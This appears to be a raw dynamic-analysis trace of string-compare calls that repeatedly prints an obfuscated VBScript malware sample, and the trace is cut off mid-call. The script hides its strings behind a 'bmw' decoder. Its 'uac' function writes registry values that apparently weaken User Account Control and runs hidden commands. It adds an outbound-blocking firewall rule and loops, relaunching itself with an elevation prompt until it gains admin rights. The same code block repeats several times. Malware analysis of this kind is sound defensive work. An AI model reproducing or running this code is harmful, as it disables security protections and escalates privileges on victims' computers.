bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0223.001] wcsncmp (_String1=" in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0223.001] wcsncmp (_String1="in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 92 [0223.001] wcsncmp (_String1="n rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 97 [0223.001] wcsncmp (_String1=" rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0223.001] wcsncmp (_String1="rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, 